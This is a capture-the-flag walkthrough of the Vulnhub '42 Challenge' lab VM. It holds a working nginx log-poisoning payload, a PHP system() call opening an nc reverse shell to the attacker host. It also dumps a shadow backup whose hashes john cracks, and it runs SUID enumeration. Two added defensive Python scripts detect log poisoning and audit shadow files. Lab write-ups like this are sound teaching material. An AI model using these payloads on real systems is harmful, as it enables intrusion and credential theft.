Vulnhub 42 Challenge Target Machine: Detailed Test Process (Partial)

42 Challenge

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:8c:89:2c      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.243  08:00:27:4f:27:cb      1      60  PCS Systemtechnik GmbH          

Using the netdiscover tool bundled with Kali Linux, the target host's IP address was identified as 192.168.56.243.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.243 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-30 09:28 EST
Nmap scan report for bogon (192.168.56.243)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:8a:b4:a8:28:76:56:ce:49:d6:d5:6c:11:e5:38:dd (RSA)
|   256 8c:f7:82:be:14:11:01:cd:d3:07:3b:87:6b:b7:fd:4c (ECDSA)
|_  256 45:56:fc:1d:10:a9:62:6f:4f:ae:66:36:aa:86:d2:e9 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Ip Pinger
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 08:00:27:4F:27:CB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds

The NMAP scan shows that the target host has two open ports: 22 (SSH) and 80 (HTTP/NGINX).

Getting a shell

Returned result (the contents of /etc/passwd):

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
marvin:x:1000:1000:42 Challenge,,,:/home/marvin:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
mysql:x:123:127:MySQL Server,,,:/nonexistent:/bin/false
lucas:x:1001:1001::/home/lucas:/bin/bash
maria:x:1002:1002::/home/maria:/bin/bash
pedro:x:1003:1003::/home/pedro:/bin/bash
laura:x:1004:1004::/home/laura:/bin/bash

Besides the root user, the following users were found:

marvin:x:1000:1000:42 Challenge,,,:/home/marvin:/bin/bash 
lucas:x:1001:1001::/home/lucas:/bin/bash 
maria:x:1002:1002::/home/maria:/bin/bash 
pedro:x:1003:1003::/home/pedro:/bin/bash 
laura:x:1004:1004::/home/laura:/bin/bash 

There is reason to believe that /var/log/nginx/access.log, the access log of the nginx web server, can be read the same way:

Returned:

192.168.56.206 - - [30/Nov/2022:23:34:10 +0100] "POST /index.php HTTP/1.1" 302 799 "http://192.168.56.243/index.php?log=logs/192.168.56.206.log" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

Therefore a shell can be obtained by injecting a PHP shell statement into the access.log file.

Insert the PHP statement into the User-Agent, then issue the request with curl:

┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ curl -A "<?php system('nc -e /bin/bash 192.168.56.206 5555'); ?>" http://192.168.56.243/index.php

Then visit the page in the browser, intercept the request with Burp Suite, and change the log parameter to /var/log/nginx/access.log.

A shell was successfully obtained on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.243] 37042
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@42Challenge:~/html$ 
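As an added example (not part of the original post), a Python check a defender could run over nginx access log lines to catch the two ingredients of the attack above: a `log` parameter steered outside the logs/ directory (for instance at /var/log/nginx/access.log) and a PHP open tag carried in the User-Agent or Referer. The sample lines are constructed, and the assumption that legitimate values look like logs/<ip>.log is taken from the referer recovered above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# nginx "combined" log format: ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Constructed sample: line 0 mirrors the benign request recovered from access.log above;
# lines 1 and 2 model a poisoned User-Agent and a log parameter aimed at the access log.
SAMPLE_LOG = [
    '192.168.56.206 - - [30/Nov/2022:23:34:10 +0100] "POST /index.php HTTP/1.1" 302 799 '
    '"http://192.168.56.243/index.php?log=logs/192.168.56.206.log" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"',
    '192.168.56.206 - - [30/Nov/2022:23:40:02 +0100] "GET /index.php HTTP/1.1" 200 512 '
    '"-" "<?php echo 1; ?>"',
    '192.168.56.206 - - [30/Nov/2022:23:41:15 +0100] '
    '"GET /index.php?log=/var/log/nginx/access.log HTTP/1.1" 200 8831 "-" "curl/7.85.0"',
]

def log_param_values(url):
    # Every value of the 'log' query parameter in a request path or referer URL.
    return parse_qs(urlsplit(url).query).get("log", [])

def is_suspicious_log_param(value):
    # Legitimate values (assumed from the referer above) are relative paths under logs/;
    # an absolute path or a '..' segment means the include is being steered elsewhere.
    return value.startswith("/") or ".." in value or not value.startswith("logs/")

def analyze(line):
    m = LOG_RE.match(line)
    if m is None:
        return ["unparseable line"]
    rec = m.groupdict()
    findings = []
    parts = rec["request"].split()            # "METHOD path HTTP/x"
    path = parts[1] if len(parts) >= 2 else ""
    for src, url in (("request", path), ("referer", rec["referer"])):
        for v in log_param_values(url):
            if is_suspicious_log_param(v):
                findings.append(f"{src}: suspicious log parameter {v!r}")
    for field in ("ua", "referer"):
        if PHP_TAG.search(rec[field]):
            findings.append(f"{field}: PHP open tag in header value")
    return findings

def scan(lines):
    return {i: f for i, line in enumerate(lines) if (f := analyze(line))}
```

Run against a real access.log, line 0 is the only one of the three that passes clean; the poisoned User-Agent is flagged before the include ever happens, which is the point at which to alert.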


Privilege escalation

Upload the linpeas.sh script to the target host's /tmp directory, make it executable, and run it:

www-data@42Challenge:~/html$ cd /tmp
cd /tmp
www-data@42Challenge:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-11-30 23:45:35--  http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 747.87K  --.-KB/s    in 0.007s  

2022-11-30 23:45:35 (104 MB/s) - 'linpeas.sh' saved [765823/765823]

www-data@42Challenge:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@42Challenge:/tmp$ ./linpeas.sh
./linpeas.sh

www-data@42Challenge:/var/backups$ cat shadow_backup.bak
cat shadow_backup.bak
root:$6$nGvBJ7Ph$jqHgNPRgfT4/lLkPMXMB0WnD9bmrTXMhjXm2OYmlKTU3G/nn5MVZ93Xi4EwX9TwP.zFwM/CUJ11wxC/whIOdF/:18319:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
avahi-autoipd:*:18295:0:99999:7:::
usbmux:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
rtkit:*:18295:0:99999:7:::
cups-pk-helper:*:18295:0:99999:7:::
speech-dispatcher:!:18295:0:99999:7:::
whoopsie:*:18295:0:99999:7:::
kernoops:*:18295:0:99999:7:::
saned:*:18295:0:99999:7:::
pulse:*:18295:0:99999:7:::
avahi:*:18295:0:99999:7:::
colord:*:18295:0:99999:7:::
hplip:*:18295:0:99999:7:::
geoclue:*:18295:0:99999:7:::
gnome-initial-setup:*:18295:0:99999:7:::
gdm:*:18295:0:99999:7:::
marvin:$6$xVRWEeia$uYlk5.Jgo0A69ykQguBDzY8AeUjvHKwj577rTmn82R6enY9r630TbgRWJmnmoqakgYx0Bg651WOM0cvKdwhaG.:18319:0:99999:7:::
sshd:*:18317:0:99999:7:::
mysql:!:18318:0:99999:7:::
lucas:$6$zBETbEhW$rF/A44Y5NCJATkFfD4Qu4lzebQ/PW5/kPD1WKTzf6/uSt4PtPXESIENWW5xd9PsKGu7k2hCLI9uz7s8HyNHdv.:18318:0:99999:7:::
maria:$6$jD/TgaEw$6HAWM6i4NUsMtSUkqx1d60cdQTLJTWIN/9Y5Qmr0pShdkhiZ/M465WwFDUj4HKnuKZuHc53GPNJg01uY/9DPQ0:18318:0:99999:7:::
www-data@42Challenge:/var/backups$ 

Copy the shadow file to the local Kali Linux machine and crack it with john:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ wget http://192.168.56.243:8000/shadow_backup.bak
--2022-11-30 09:53:18--  http://192.168.56.243:8000/shadow_backup.bak
Connecting to 192.168.56.243:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1670 (1.6K) [application/x-trash]
Saving to: ‘shadow_backup.bak’

shadow_backup.bak               100%[=====================================================>]   1.63K  --.-KB/s    in 0s      

2022-11-30 09:53:18 (535 MB/s) - ‘shadow_backup.bak’ saved [1670/1670]

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ ls
linpeas.sh  nmap_full_scan  shadow_backup.bak
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ vim shadow_backup.bak         
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow_backup.bak 
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
marvinthemartian (marvin)     
1g 0:02:54:15 DONE (2022-11-30 12:48) 0.000095g/s 1371p/s 4154c/s 4154C/s  naptown410..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
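As an added example (not from the original post), a Python audit for a shadow-format file like the one found in /var/backups: it classifies each password field, reads the sha512crypt round count (glibc's default of 5000 when no rounds= field is present, which is the cost john reported above) and lists the accounts that would be open to offline cracking if the copy leaked. The sample entries and their hash bodies are constructed placeholders.

```python
import os
import stat

# crypt(3) identifiers; anything else in the $id$ slot is reported as unknown
ALGOS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt", "2b": "bcrypt"}
GLIBC_DEFAULT_ROUNDS = 5000   # sha256crypt/sha512crypt cost when no rounds= field is present

# Constructed sample in shadow format (name:hash:lastchange:min:max:warn:inactive:expire:reserved).
# Hash bodies are placeholders, not real digests.
SAMPLE_SHADOW = """\
root:$6$nGvBJ7Ph$CONSTRUCTEDHASH0:18319:0:99999:7:::
daemon:*:18295:0:99999:7:::
mysql:!:18318:0:99999:7:::
marvin:$6$xVRWEeia$CONSTRUCTEDHASH1:18319:0:99999:7:::
svc:$6$rounds=100000$c0nstructed$CONSTRUCTEDHASH2:18319:0:99999:7:::
"""

def classify_hash(field):
    """Return (kind, rounds): kind is 'locked', 'empty', an algorithm name or 'unknown'."""
    if field == "*" or field.startswith("!"):
        return ("locked", None)
    if field == "":
        return ("empty", None)            # no password at all
    parts = field.split("$")              # "$6$[rounds=N$]salt$hash"
    if len(parts) < 4 or parts[0] != "":
        return ("unknown", None)
    algo = ALGOS.get(parts[1], "unknown")
    rounds = GLIBC_DEFAULT_ROUNDS if algo in ("sha256crypt", "sha512crypt") else None
    if parts[2].startswith("rounds="):
        rounds = int(parts[2].split("=", 1)[1])
    return (algo, rounds)

def audit_shadow(text):
    """List accounts with a usable hash and flag those that are cheap to crack offline."""
    report = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, pw = line.split(":")[:2]
        kind, rounds = classify_hash(pw)
        if kind == "locked":
            continue
        weak = kind in ("empty", "md5crypt") or (rounds is not None and rounds <= GLIBC_DEFAULT_ROUNDS)
        report.append({"user": name, "algo": kind, "rounds": rounds, "weak": weak})
    return report

def mode_is_exposed(st_mode):
    """True if a shadow copy is readable by 'others'; a backup should be 0600 and root-owned."""
    return bool(st_mode & stat.S_IROTH)

def backup_is_exposed(path):
    return mode_is_exposed(os.stat(path).st_mode)
```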

The password of one user, marvin, was cracked: marvinthemartian. Log in over SSH:

┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ ssh marvin@192.168.56.243
The authenticity of host '192.168.56.243 (192.168.56.243)' can't be established.
ED25519 key fingerprint is SHA256:jSmsE5gghATkcr/R8K7EHpWYAtsBdxMG3VZHrrdWKIk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.243' (ED25519) to the list of known hosts.
marvin@192.168.56.243's password: 

                :dMMMMMMMMd:   oMMMMMMMdyMMMMMMMMM
             /mMMMMMMMNh-       oMMMh:   +MMMMMMMMM
         +mMMMMMMMNy-           --      .yMMMMMMMMm
     .+mMMMMMMMNs-                   .oNMMMMMMMd/
 .omMMMMMMMmo.                   -sNMMMMMMMh/     .
MMMMMMMMMMMMMMMMMMMMMMMMMMMm   oMMMMMMMMN      -sN
MMMMMMMMMMMMMMMMMMMMMMMMMMMN   oMMMMMMMMN    -yNMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMN   oMMMMMMMMN  -yNMMMM
yyyyyyyyyyyyyyyyyyNMMMMMMMMN   oMMMMMMMMN:hNMMMMMM
                  mMMMMMMMMN   -ooooooooo+oooooooo
                  mMMMMMMMMN
                  mMMMMMMMMN
                  mMMMMMMMMN

Welcome to the 42Challenge

Last login: Tue Apr 14 12:43:13 2020 from 192.168.1.91
marvin@42Challenge:~$ id
uid=1000(marvin) gid=1000(marvin) grupos=1000(marvin)
marvin@42Challenge:~$ 

marvin@42Challenge:~$ find / -perm -4000 -type f 2>/dev/null
/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ping
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/Lucas_Access
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/arping
/usr/bin/chfn
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8935/bin/mount
/snap/core/8935/bin/ping
/snap/core/8935/bin/ping6
/snap/core/8935/bin/su
/snap/core/8935/bin/umount
/snap/core/8935/usr/bin/chfn
/snap/core/8935/usr/bin/chsh
/snap/core/8935/usr/bin/gpasswd
/snap/core/8935/usr/bin/newgrp
/snap/core/8935/usr/bin/passwd
/snap/core/8935/usr/bin/sudo
/snap/core/8935/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8935/usr/lib/openssh/ssh-keysign
/snap/core/8935/usr/lib/snapd/snap-confine
/snap/core/8935/usr/sbin/pppd
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd

marvin@42Challenge:~$ cat flag.txt
42challenge{marvin_92e8dd9db0b4bd058eaa3ae340c41900}
marvin@42Challenge:~$ 

/usr/bin/Lucas_Access was found to have the SUID bit set and may be exploitable; download it to the local machine:

marvin@42Challenge:~$ ls
Descargas  Documentos  Escritorio  flag.txt  Imágenes  Lucas_Access  Música  Plantillas  Público  Vídeos
marvin@42Challenge:~$ python -m http.server 9000
/usr/bin/python: No module named http
marvin@42Challenge:~$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...


┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ wget http://192.168.56.243:9000/Lucas_Access                      
--2022-11-30 17:58:30--  http://192.168.56.243:9000/Lucas_Access
Connecting to 192.168.56.243:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12864 (13K) [application/octet-stream]
Saving to: ‘Lucas_Access’

Lucas_Access                    100%[=====================================================>]  12.56K  --.-KB/s    in 0s      

2022-11-30 17:58:30 (536 MB/s) - ‘Lucas_Access’ saved [12864/12864]

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ ls
linpeas.sh  Lucas_Access  nmap_full_scan  shadow_backup.bak

┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo gdb ./Lucas_Access    
GNU gdb (Debian 12.1-4) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./Lucas_Access...
(No debugging symbols found in ./Lucas_Access)
(gdb) breakpoint *0x0000000000000a80
Undefined command: "breakpoint".  Try "help".
(gdb) break *0x0000000000000a80
Breakpoint 1 at 0xa80
(gdb) run
Starting program: /home/kali/Vulnhub/42Challenge/Lucas_Access 
zsh:1: permission denied: /home/kali/Vulnhub/42Challenge/Lucas_Access
During startup program exited with code 126.
(gdb) Quit
(gdb) exit
                                      

Couldn't get the gdb debugging to work; stopping here for now.

posted @ 2022-12-01 09:41  Jason_huawen